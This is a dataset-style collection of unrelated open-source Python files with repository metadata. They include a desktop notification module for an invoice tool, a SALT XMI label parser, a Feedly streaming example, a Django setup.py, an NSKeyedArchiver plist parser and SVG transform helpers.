bb7baf8c8805cb067d4cf73845cfee7e1f0d116f
| 2,835
|
py
|
Python
|
invoice/spy/notify_osd.py
|
simone-campagna/invoice
|
6446cf6ebb158b895cd11d707eb019ae23833881
|
[
"Apache-2.0"
] | null | null | null |
invoice/spy/notify_osd.py
|
simone-campagna/invoice
|
6446cf6ebb158b895cd11d707eb019ae23833881
|
[
"Apache-2.0"
] | 16
|
2015-01-30T16:28:54.000Z
|
2015-03-02T14:18:56.000Z
|
invoice/spy/notify_osd.py
|
simone-campagna/invoice
|
6446cf6ebb158b895cd11d707eb019ae23833881
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2015 Simone Campagna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__author__ = "Simone Campagna"
__all__ = [
    'available',
'notify',
]
import os
try: # pragma: no cover
import notify2
HAS_NOTIFY2 = True
except ImportError:
HAS_NOTIFY2 = False
from . import text_formatter
_NOTIFICATION = None
def available(): # pragma: no cover
return HAS_NOTIFY2
_PACKAGE_DIR = os.path.dirname(__file__)
_ICONS = {
'info': os.path.join(_PACKAGE_DIR, 'icons', 'logo_info.jpg'),
'warning': os.path.join(_PACKAGE_DIR, 'icons', 'logo_warning.jpg'),
'error': os.path.join(_PACKAGE_DIR, 'icons', 'logo_error.jpg'),
}
if HAS_NOTIFY2: # pragma: no cover
def notify(logger, validation_result, scan_events, updated_invoice_collection, event_queue, spy_notify_level):
notification_required, kind, title, text, detailed_text = text_formatter.formatter(
validation_result=validation_result,
scan_events=scan_events,
updated_invoice_collection=updated_invoice_collection,
event_queue=event_queue,
mode=text_formatter.MODE_SHORT,
spy_notify_level=spy_notify_level,
)
if notification_required:
global _NOTIFICATION
summary = title + ' [{}]'.format(kind.upper())
message = text
if detailed_text:
message += '\n\n' + detailed_text
icon = _ICONS[kind]
if _NOTIFICATION is None:
notify2.init("Invoice spy [{}]".format(kind.upper()))
_NOTIFICATION = notify2.Notification(summary=summary, message=message, icon=icon)
notification = _NOTIFICATION
urgency_d = {
'info': notify2.URGENCY_LOW,
'warning': notify2.URGENCY_NORMAL,
'error': notify2.URGENCY_CRITICAL,
}
notification.update(summary=summary, message=message, icon=icon)
notification.set_urgency(urgency_d[kind])
#if notify_pyqt4.available():
# callback = lambda : notify_pyqt4.notify(logger, kind, title, text, detailed_text)
# notification.add_action("fai qualcosa", "qualcosa", callback, user_data=None)
notification.show()
else:
notify = None
| 35
| 114
| 0.65679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,023
| 0.360847
|
bb7bc4b7cb8f753fbf39ae6cb16944a05b0ab207
| 3,878
|
py
|
Python
|
src/discoursegraphs/readwrite/salt/labels.py
|
arne-cl/discoursegraphs
|
4e14688e19c980ac9bbac75ff1bf5d751ef44ac3
|
[
"BSD-3-Clause"
] | 41
|
2015-02-20T00:35:39.000Z
|
2022-03-15T13:54:13.000Z
|
src/discoursegraphs/readwrite/salt/labels.py
|
arne-cl/discoursegraphs
|
4e14688e19c980ac9bbac75ff1bf5d751ef44ac3
|
[
"BSD-3-Clause"
] | 68
|
2015-01-09T18:07:38.000Z
|
2021-10-06T16:30:43.000Z
|
src/discoursegraphs/readwrite/salt/labels.py
|
arne-cl/discoursegraphs
|
4e14688e19c980ac9bbac75ff1bf5d751ef44ac3
|
[
"BSD-3-Clause"
] | 8
|
2015-02-20T00:35:48.000Z
|
2021-10-30T14:09:03.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This module handles the parsing of SALT labels.
There are three types of labels (SFeature, SElementId, SAnnotation).
Labels can occur as children of these elements: 'layers', 'nodes', 'edges'
and '{sDocumentStructure}SDocumentGraph'.
"""
from lxml.builder import ElementMaker
from discoursegraphs.readwrite.salt.util import (get_xsi_type, string2xmihex,
NAMESPACES)
XSI = "http://www.w3.org/2001/XMLSchema-instance"
class SaltLabel(object):
"""
Two or more ``SaltLabel``s are attached to each element in a SaltXMI
file: one label representing the name (``SNAME``) of the element, one
representing its ID and one label for each kind of annotation associated
with that element.
"""
def __init__(self, name, value, xsi_type, namespace=None, hexvalue=None):
"""
create a SaltLabel from scratch.
Parameters
----------
name : str
the name of the label, e.g. ``SNAME`` or ``id``
namespace : str or None
the namespace of the label, e.g. ``salt`` or ``graph``
value : str
the actual label value, e.g. ``sSpan19`` or ``NP``
hexvalue: str or None
a weird hex-based representation of the value, which always starts
with ``ACED00057``. If it is not set, we can automatically generate
it, but we can't guarantee that it matches the value SaltNPepper
would have generated.
xsi_type : str
the type of the label, e.g. ``saltCore:SFeature`` or
``saltCore:SAnnotation``
"""
self.xsi_type = xsi_type
self.namespace = namespace if namespace else None
self.name = name
self.value = value
self.hexvalue = hexvalue if hexvalue else string2xmihex(value)
@classmethod
def from_etree(cls, etree_element):
"""
creates a ``SaltLabel`` from an etree element representing a label
element in a SaltXMI file.
A label element in SaltXMI looks like this::
<labels xsi:type="saltCore:SFeature" namespace="salt"
name="SNAME" value="ACED0005740007735370616E3139"
valueString="sSpan19"/>
Parameters
----------
etree_element : lxml.etree._Element
an etree element parsed from a SaltXMI document
"""
return cls(name=etree_element.attrib['name'],
value=etree_element.attrib['valueString'],
xsi_type=get_xsi_type(etree_element),
namespace=etree_element.attrib.get('namespace'),
hexvalue=etree_element.attrib['value'])
def to_etree(self):
"""
creates an etree element of a ``SaltLabel`` that mimicks a SaltXMI
<labels> element
"""
attribs = {
'{{{pre}}}type'.format(pre=NAMESPACES['xsi']): self.xsi_type,
'namespace': self.namespace, 'name': self.name,
'value': self.hexvalue, 'valueString': self.value}
non_empty_attribs = {key: val for (key, val) in attribs.items()
if val is not None}
E = ElementMaker()
return E('labels', non_empty_attribs)
def get_namespace(label):
"""
returns the namespace of an etree element or None, if the element
doesn't have that attribute.
"""
if 'namespace' in label.attrib:
return label.attrib['namespace']
else:
return None
def get_annotation(label):
"""
returns an annotation (key, value) tuple given an etree element
(with tag 'labels' and xsi type 'SAnnotation'), e.g. ('tiger.pos', 'ART')
"""
assert get_xsi_type(label) == 'saltCore:SAnnotation'
return (label.attrib['name'], label.attrib['valueString'])
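A usage sketch built from the sample element quoted in the from_etree docstring; the xmlns:xsi declaration is added so lxml can parse the fragment on its own:
from lxml import etree
xml = ('<labels xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
       'xsi:type="saltCore:SFeature" namespace="salt" name="SNAME" '
       'value="ACED0005740007735370616E3139" valueString="sSpan19"/>')
label = SaltLabel.from_etree(etree.fromstring(xml))
print(label.name, label.value)  # SNAME sSpan19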
| 35.577982
| 79
| 0.60624
| 2,791
| 0.719701
| 0
| 0
| 856
| 0.220732
| 0
| 0
| 2,414
| 0.622486
|
bb7c19c39a756e836f832fe37756f912b98af313
| 1,214
|
py
|
Python
|
examples/stream_entries.py
|
feedly/python-api-client
|
a211734a77337145efa0d1a1ddfe484f74530998
|
[
"MIT"
] | 31
|
2018-08-20T08:35:09.000Z
|
2022-03-21T04:17:27.000Z
|
examples/stream_entries.py
|
feedly/python-api-client
|
a211734a77337145efa0d1a1ddfe484f74530998
|
[
"MIT"
] | 8
|
2018-10-17T18:09:44.000Z
|
2021-12-14T10:03:34.000Z
|
examples/stream_entries.py
|
feedly/python-api-client
|
a211734a77337145efa0d1a1ddfe484f74530998
|
[
"MIT"
] | 7
|
2018-09-04T01:10:48.000Z
|
2021-08-19T11:07:54.000Z
|
from feedly.api_client.session import FeedlySession
from feedly.api_client.stream import StreamOptions
from feedly.api_client.utils import run_example
def example_stream_entries():
"""
This example will prompt you to enter a category name, download the 10 latest articles from it, and display their
titles.
"""
# Prompt for the category name/id to use
user_category_name_or_id = input("> User category name or id: ")
# Create the session using the default auth directory
session = FeedlySession()
# Fetch the category by its name/id
# To use an enterprise category, change to `session.user.enterprise_categories`. Tags are also supported.
category = session.user.user_categories.get(user_category_name_or_id)
# Stream 10 articles with their contents from the category
for article in category.stream_contents(options=StreamOptions(max_count=10)):
# Print the title of each article
print(article["title"])
if __name__ == "__main__":
# Will prompt for the token if missing, and launch the example above
# If a token expired error is raised, will prompt for a new token and restart the example
run_example(example_stream_entries)
| 39.16129
| 117
| 0.74547
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 670
| 0.551895
|
bb809b94005596a2a1d4a23ab288a44cc7045e25
| 141
|
py
|
Python
|
program5.py
|
kashifrepo/Python-Saylani
|
1ac9fe05012ad716d4ef30d771d9828f91221ac6
|
[
"Apache-2.0"
] | null | null | null |
program5.py
|
kashifrepo/Python-Saylani
|
1ac9fe05012ad716d4ef30d771d9828f91221ac6
|
[
"Apache-2.0"
] | null | null | null |
program5.py
|
kashifrepo/Python-Saylani
|
1ac9fe05012ad716d4ef30d771d9828f91221ac6
|
[
"Apache-2.0"
] | null | null | null |
# Program no 5
firstname = input(" Enter 1st name ")
lastname = input(" Enter last name ")
print(firstname[::-1])
print(lastname[::-1])
| 20.142857
| 38
| 0.617021
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 52
| 0.368794
|
bb835887638d97fd49e95038db89b9f00019f7b3
| 1,343
|
py
|
Python
|
setup.py
|
wo0dyn/django-basic-models-behaviors
|
19bbd09630c38451c89f32d38023053b23995db9
|
[
"BSD-3-Clause"
] | 2
|
2016-07-14T00:29:59.000Z
|
2016-07-18T02:55:35.000Z
|
setup.py
|
wo0dyn/django-basic-models-behaviors
|
19bbd09630c38451c89f32d38023053b23995db9
|
[
"BSD-3-Clause"
] | 5
|
2015-07-02T07:42:10.000Z
|
2020-06-05T16:54:04.000Z
|
setup.py
|
wo0dyn/django-basic-models-behaviors
|
19bbd09630c38451c89f32d38023053b23995db9
|
[
"BSD-3-Clause"
] | 1
|
2015-10-20T10:11:35.000Z
|
2015-10-20T10:11:35.000Z
|
# -*- coding: utf-8 -*-
import codecs
import os
from setuptools import setup
def read(*parts):
return codecs.open(os.path.join(os.path.dirname(__file__), *parts), encoding='utf-8').read()
setup(
name='django-basic-models-behaviors',
version=__import__('basic_models_behaviors').__version__,
description='Tiny app to provide basic behaviors for django models.',
long_description=read('README.rst'),
author='Nicolas Dubois',
author_email='nicolas.c.dubois@gmail.com',
url='https://github.com/wo0dyn/django-basic-models-behaviors',
keywords="django",
packages=['basic_models_behaviors'],
include_package_data=True,
zip_safe=False,
license='MIT License',
platforms=['any'],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
]
)
| 31.97619
| 96
| 0.638124
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 760
| 0.565897
|
bb84b60c8bd64fa0c7fda5ba539335cf5ce1fc5a
| 10,746
|
py
|
Python
|
plistutils/nskeyedarchiver.py
|
sathwikv143/plistutils
|
fc7783449da1ed222547ceb5c416402216fa9b34
|
[
"BSD-3-Clause"
] | 35
|
2017-10-17T17:24:16.000Z
|
2022-03-18T22:10:47.000Z
|
plistutils/nskeyedarchiver.py
|
sathwikv143/plistutils
|
fc7783449da1ed222547ceb5c416402216fa9b34
|
[
"BSD-3-Clause"
] | 1
|
2021-07-09T01:06:30.000Z
|
2021-07-09T01:06:30.000Z
|
plistutils/nskeyedarchiver.py
|
sathwikv143/plistutils
|
fc7783449da1ed222547ceb5c416402216fa9b34
|
[
"BSD-3-Clause"
] | 4
|
2018-11-17T15:52:36.000Z
|
2022-02-28T08:01:14.000Z
|
import logging
from uuid import UUID
from biplist import Data, Uid
from plistutils.utils import parse_mac_absolute_time
logger = logging.getLogger(__name__)
class NSKeyedArchiveException(Exception):
pass
class NSKeyedArchiveParser(object):
# https://developer.apple.com/documentation/foundation/nskeyedarchiver
KNOWN_VERSIONS = [100000]
def __init__(self, fullpath):
self.fullpath = fullpath
@staticmethod
def is_known_nskeyedarchive(plist_data, fullpath):
if plist_data:
archiver = plist_data.get('$archiver')
version = plist_data.get('$version')
# NR -> iOS NanoRegistry KeyedArchiver (inherits from NSKeyedArchiver)
if archiver in ['NRKeyedArchiver', 'NSKeyedArchiver']:
if version in NSKeyedArchiveParser.KNOWN_VERSIONS:
return True
else:
logger.error("Unknown NSKeyedArchiver version '{}' in file {}, please report.", version, fullpath)
return False
def parse_archive(self, plist_data):
"""
:param plist_data: pre-parsed plist data
:return: parsed dict
"""
ret = {}
objects_list = plist_data.get('$objects')
if objects_list:
for name, val in plist_data.get('$top', {}).items():
if isinstance(val, Uid):
top = objects_list[val.integer]
try:
ret[name] = self.process_obj(top, objects_list)
except RecursionError:
# failsafe
logger.error(
"Could not parse NSKeyedArchive '{}' in top key '{}' due to infinite recursion",
self.fullpath, name)
else:
ret[name] = val
return ret
def process_obj(self, obj, objects_list, parents=None):
if parents is None:
parents = set()
obj_id = id(obj)
if obj_id in parents:
raise NSKeyedArchiveException("Infinite loop detected while parsing NSKeyedArchive data in '{}'".format(self.fullpath))
else:
parents.add(obj_id)
ret = obj
if isinstance(obj, dict):
ret = self.convert_dict(obj, objects_list, parents)
elif isinstance(obj, list):
ret = [self.process_obj(x, objects_list, parents) for x in obj]
elif isinstance(obj, Uid):
ret = self.process_obj(objects_list[obj.integer], objects_list, parents)
elif isinstance(obj, (bool, bytes, int, float)) or obj is None:
ret = obj
elif isinstance(obj, str):
ret = self.convert_string(obj)
elif isinstance(obj, Data):
ret = bytes(obj)
else:
logger.warning("Unexpected data type '{}' in '{}', please report.", type(obj).__name__, self.fullpath)
parents.remove(obj_id)
return ret
def _process_ns_dictionary(self, _class_name, d, objects_list, parents):
if 'NS.keys' in d and 'NS.objects' in d:
assembled_dict = {}
for idx, k in enumerate(d['NS.keys']):
assembled_dict[self.process_obj(k, objects_list, parents)] = self.process_obj(d['NS.objects'][idx],
objects_list, parents)
return assembled_dict
return d
def _process_ns_url(self, _class_name, d, objects_list, parents):
base = self.process_obj(d.get('NS.base', ''), objects_list, parents)
relative = self.process_obj(d.get('NS.relative', ''), objects_list, parents)
return '/'.join([x for x in [base, relative] if x])
def _process_ns_uuid(self, _class_name, d, _objects_list, _parents):
uuid_bytes = d.get('NS.uuidbytes', '')
if len(uuid_bytes) == 16:
return str(UUID(bytes=uuid_bytes))
return uuid_bytes
def _process_ns_sequence(self, _class_name, d, objects_list, parents):
array_members = d.get('NS.objects')
return [self.process_obj(member, objects_list, parents) for member in array_members]
def _process_ns_data(self, _class_name, d, _objects_list, _parents):
data = d.get('NS.data', None)
if isinstance(data, dict) and self.is_known_nskeyedarchive(data, ''):
return self.parse_archive(data)
return data
def _process_ns_null(self, _class_name, d, _objects_list, _parents):
return None
def _process_ns_string(self, _class_name, d, _objects_list, _parents):
return d.get('NS.string', None)
def _process_ns_attributed_string(self, class_name, d, objects_list, parents):
# Sample:
# {'NSAttributeInfo': Uid(74), '$class': Uid(51), 'NSString': Uid(68), 'NSAttributes': Uid(69)}
# TODO if demand - process NSAttributes, NSAttributeInfo (font, color, style, etc)
return self.process_obj(d.get('NSString'), objects_list, parents)
def _process_ns_range(self, _class_name, d, objects_list, parents):
# length: The number of items in the range (can be 0). LONG_MAX is the maximum value you should use for length.
# location: The start index (0 is the first). LONG_MAX is the maximum value you should use for location.
#
return {
'length': self.process_obj(d.get('NS.rangeval.length'), objects_list, parents),
'location': self.process_obj(d.get('NS.rangeval.location'), objects_list, parents)
}
def _process_ns_value(self, class_name, d, objects_list, parents):
# An NSValue object can hold any of the scalar types such as int, float, and char,
# as well as pointers, structures, and object id references.
#
# NS.special: 1 : NSPoint, 2 : NSSize, 3 : NSRect, 4 : NSRange, 12 : NSEdgeInsets
#
# NSConcreteValue varies based on type, which is typically provided by the @encode compiler directive
# https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/ObjCRuntimeGuide/Articles/ocrtTypeEncodings.html#//apple_ref/doc/uid/TP40008048-CH100
# These types are voluminous, and we need samples to support them.
# https://github.com/apple/swift-corelibs-foundation/blob/master/Foundation/NSSpecialValue.swift
ns_value_special_types = {
# 1: 'NSPoint'
# 2: 'NSSize'
# 3: 'NSRect' https://github.com/apple/swift-corelibs-foundation/blob/master/TestFoundation/Resources/NSKeyedUnarchiver-RectTest.plist
4: NSKeyedArchiveParser._process_ns_range,
# 12: 'NSEdgeInsets' https://github.com/apple/swift-corelibs-foundation/blob/master/TestFoundation/Resources/NSKeyedUnarchiver-EdgeInsetsTest.plist
}
special_type = d.get('NS.special')
if special_type: # NSSpecialValue
if special_type in ns_value_special_types:
return ns_value_special_types[special_type](self, class_name, d, objects_list, parents)
else:
logger.error("Unsupported NSValue special type {} in NSKeyedArchiver data, please report.", special_type)
else: # NSConcreteValue
logger.error("Unsupported NSConcreteValue type in NSKeyedArchiver data, please report.", special_type)
return None
def _process_ns_list_item(self, _class_name, d, objects_list, parents):
# TODO 'properties' is an NSDictionary
return {
'url': self.process_obj(d.get('URL', None), objects_list, parents),
'bookmark': self.process_obj(d.get('bookmark', None), objects_list, parents),
'name': self.process_obj(d.get('name', None), objects_list, parents),
'order': self.process_obj(d.get('order', None), objects_list, parents),
'uuid': self.process_obj(d.get('uniqueIdentifier', None), objects_list, parents)
}
def _process_ns_date(self, _class_name, d, _objects_list, _parents):
return parse_mac_absolute_time(d.get('NS.time'))
def _process_default(self, class_name, d, _objects_list, _parents):
logger.warning(
"Unknown NSKeyedArchiver class name {} with data ({}) in '{}', please report.", class_name, d, self.fullpath)
@classmethod
def get_processors(cls):
return {
'NSArray': cls._process_ns_sequence,
'NSAttributedString': cls._process_ns_attributed_string,
# 'NSCache'
# 'NSColor' simple sample: {'NSColorSpace': 3, 'NSWhite': b'0\x00'},
# 'NSCompoundPredicate'
'NSData': cls._process_ns_data,
'NSDate': cls._process_ns_date,
'NSDictionary': cls._process_ns_dictionary,
# 'NSError'
# 'NSFont' sample: {'NSName': 'Helvetica', 'NSSize': 12.0, 'NSfFlags': 16},
# 'NSGeometry'
# 'NSLocale'
'NSMutableArray': cls._process_ns_sequence,
'NSMutableAttributedString': cls._process_ns_attributed_string,
'NSMutableData': cls._process_ns_data,
'NSMutableDictionary': cls._process_ns_dictionary,
'NSMutableSet': cls._process_ns_sequence,
'NSMutableString': cls._process_ns_string,
# 'NSNotification' https://github.com/apple/swift-corelibs-foundation/blob/master/TestFoundation/Resources/NSKeyedUnarchiver-NotificationTest.plist
'NSNull': cls._process_ns_null,
# 'NSNumber'
# 'NSOrderedSet' https://github.com/apple/swift-corelibs-foundation/blob/master/TestFoundation/Resources/NSKeyedUnarchiver-OrderedSetTest.plist
# 'NSParagraphStyle' sample: {'NSAlignment': 4, 'NSTabStops': '$null'},
# 'NSPredicate'
# 'NSProgressFraction'
# 'NSRange'
# 'NSRegularExpression'
'NSSet': cls._process_ns_sequence,
'NSString': cls._process_ns_string,
'NSURL': cls._process_ns_url,
'NSUUID': cls._process_ns_uuid,
'NSValue': cls._process_ns_value,
'SFLListItem': cls._process_ns_list_item
}
def convert_dict(self, d, objects_list, parents):
if '$class' in d:
try:
class_name = self.process_obj(d['$class'], objects_list, parents).get('$classname')
return self.get_processors().get(class_name, NSKeyedArchiveParser._process_default)(self, class_name, d, objects_list, parents)
except (AttributeError, KeyError, ValueError):
pass
return d
def convert_string(self, obj):
if obj == '$null':
return None
return obj
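A hedged usage sketch for the parser above; sample.plist is a placeholder for any NSKeyedArchiver-encoded property list, read with biplist to match the module's imports:
from biplist import readPlist
path = 'sample.plist'  # assumed input file
plist_data = readPlist(path)
if NSKeyedArchiveParser.is_known_nskeyedarchive(plist_data, path):
    parsed = NSKeyedArchiveParser(path).parse_archive(plist_data)
    print(parsed.get('root'))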
| 45.72766
| 170
| 0.622557
| 10,577
| 0.984273
| 0
| 0
| 2,464
| 0.229295
| 0
| 0
| 3,451
| 0.321143
|
bb85cd6b9000d3cdaff7738f7a55a4fc05c3ab98
| 89
|
py
|
Python
|
guillotina_volto/blocks/__init__.py
|
enfold/guillotina-volto
|
d38ee300470c813c99341eaeb2ba8a2b5fb7d778
|
[
"BSD-2-Clause"
] | 5
|
2018-11-11T07:19:06.000Z
|
2020-01-18T11:04:15.000Z
|
guillotina_volto/blocks/__init__.py
|
enfold/guillotina-volto
|
d38ee300470c813c99341eaeb2ba8a2b5fb7d778
|
[
"BSD-2-Clause"
] | 4
|
2021-05-14T20:21:03.000Z
|
2021-11-18T01:27:04.000Z
|
guillotina_volto/blocks/__init__.py
|
enfold/guillotina-volto
|
d38ee300470c813c99341eaeb2ba8a2b5fb7d778
|
[
"BSD-2-Clause"
] | 2
|
2019-06-14T10:42:22.000Z
|
2020-05-09T13:09:09.000Z
|
from . import default # noqa
from . import types # noqa
from . import standard # noqa
| 22.25
| 30
| 0.696629
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 18
| 0.202247
|
bb86c442b96d2055b1909d4bb39b8d492cac5efe
| 1,131
|
py
|
Python
|
plotdotroot/plotdot/svgDraw/transform.py
|
hodeld/axidraw
|
b5009779d01f209b7fe712a92aa9c117ce32f70a
|
[
"MIT"
] | 1
|
2020-07-28T15:09:57.000Z
|
2020-07-28T15:09:57.000Z
|
plotdotroot/plotdot/svgDraw/transform.py
|
hodeld/axidraw
|
b5009779d01f209b7fe712a92aa9c117ce32f70a
|
[
"MIT"
] | 4
|
2021-04-08T21:33:10.000Z
|
2021-09-22T19:29:10.000Z
|
plotdotroot/plotdot/svgDraw/transform.py
|
hodeld/axidraw
|
b5009779d01f209b7fe712a92aa9c117ce32f70a
|
[
"MIT"
] | 1
|
2022-03-18T18:07:27.000Z
|
2022-03-18T18:07:27.000Z
|
import random
def scale(ele, sx, sy=None):
if sy is None:
sy = sx
ele.scale(sx, sy)
def translate(ele, sx, sy=0):
ele.translate(sx, sy)
def skew_x(ele, angle, sy=None):
ele.skewX(angle)
def skew_y(ele, angle, sy=None):
    ele.skewY(angle)
def rotate(ele, angle, sy=None):
    ele.rotate(angle)
_TRANSF_FN = {1: scale,
2: translate,
3: skew_x,
4: skew_y,
5: rotate,
}
_SCALE_TRANS = {1: (1, 1)}
def transform_random(svg_ele):
return svg_ele
def transform_cont(elemnts):
sx, sy = random.randint(1, 10), random.randint(1, 10)
trans_meth = random.randint(1, 4)
    x_f, y_f = _SCALE_TRANS.get(trans_meth, (1, 1))  # fall back to no scaling for methods without an entry
sx_b = sx * x_f
sy_b = sy * y_f
velo = 0.1 # float 0 ... 1
dispatch_fn = _TRANSF_FN
for k, ele in enumerate(elemnts):
        factor = 1 + k * velo
        sx, sy = sx_b * factor, sy_b * factor
dispatch_fn[trans_meth](ele, sx, sy)
sx_b, sy_b = sx, sy
def transform_allmeths(ele, trans_dic):
dispatch_fn = _TRANSF_FN
for k, (x, y) in trans_dic.items():
dispatch_fn[k](ele, x, y)
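A hedged usage sketch; svgwrite is an assumption for the element type, chosen because its shapes expose the translate/scale/skewX/skewY methods these helpers call:
import svgwrite
dwg = svgwrite.Drawing('out.svg')
rect = dwg.add(dwg.rect(insert=(10, 10), size=(20, 20)))
transform_allmeths(rect, {1: (2, 2), 2: (5, 0)})  # scale 2x, then translate by (5, 0)
dwg.save()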
| 17.952381
| 57
| 0.568523
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 15
| 0.013263
|